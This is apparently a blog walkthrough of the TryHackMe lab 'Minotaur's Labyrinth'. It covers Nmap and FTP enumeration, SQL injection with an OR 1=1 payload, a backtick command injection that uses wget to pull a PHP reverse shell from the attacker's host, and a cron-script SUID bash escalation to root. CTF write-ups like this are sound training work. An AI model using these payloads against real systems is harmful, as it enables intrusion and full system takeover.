Hi everyone!
In this story i will cover the ‘Minotaur’s Labyrinth’ from TryHackMe rated Medium.
The main topics are: Enumeration, SQL Injection, Command Injection and Privilege Escalation.
Alright, let’s start.
Enumeration
As always, we start with a pretty classic Nmap Scan.
sudo nmap -p- -sV -T4 -A -o all_ports <MACHINE_IP>
- sV = Service Version.
- T4 = 4 Threads.
- -p- = Scan all ports.
- A = Aggresive mode.
- -o = Output to a file.
Port 21:
It is running ProFTPD and it allows anonymous login.
Let’s connect to it as anonymous using ftp.
Here we find a directory and some files.
Hint: Remember ALWAYS to use ‘ls -al’ and not only ls.
Grab those files with get command and grab the first flag too.
One of those files speaks about a timer… don’t forget this, it’s gonna be useful later.
Port 3306:
As you can see on the Nmap output our IP is not allowed to connect to this MariaDB instance, so, we can’t do much on it.
Port 80/443:
Here we find a login page. We still don’t have credentials tho.
Checking the source code we find an interesting js file.
As you can see there is a comment that tell us how to build the password.
You can do this manually or use node to do it faster.
Just copy the function and the next line to build it up.
Now, use Daedalus as the username and the found password to login.
Dashboard
Here we see a search section where we can search for People or Creature.
SQL Injection
We could take advantage of this just using “ ‘OR 1=1 — -” or just going in the /api (In the source code there is a file called userlvl.js that leaks this endpoint) directory and looking for the read.php file.
Here we find some usernames and some password.
We can use john, hashcat or some online tools.
I used crackstation in this scenario and it cracked almost all the hash.
Since we have some password we could try to login again in the panel.
M!n0taur and his password works fine and here we see 2 things:
- Second flag
- Secret_Stuff page
In the secret_stuff page we see a super secret panel that echoes back whatever you put inside it.
It looks like it is running system command “echo” to do this.
Let’s try some common techniques for Command Injection.
Using backticks (``) works pretty good and leads to Command Injection.
In the THM page the hint says that some characters are blacklisted, let’s try to build up a payload using only allowed characters.
`wget <VPN_IP>/shell.php -O /tmp/shell.php`
Where shell.php is the classic php reverse shell.
Now, start a listener and then call the shell.
nc -nvlp 4444`
php /tmp/shell.php`
Privilege Escalation
Right now we have a shell as the daemon user.
If you remember at the start of the machine, in the ftp, we found a file that was talking about a timer…
Looking around we find 2 interesting directories in the / directory.
- reminders
- timers
In the reminders directory we see a .txt file with stuff inside.
In the timers directory we find a Bash script that we are able to modify.
Since there is an high chance that this script is a cron-like file we can easily use this for privilege escalation.
Let’s modify its content with this:
cp /bin/bash /tmp/rootshell && chmod u+s /tmp/rootshell
This is just copying the bash binary and giving it SUID permissions.
Now waiting a minute this is gonna be executed and we will find the binary in the tmp directory.
/tmp/rootshell -p
And voilà, we have root permissions :).
This is it, thanks for reading and as always: Happy Hacking! 😊🎉💕
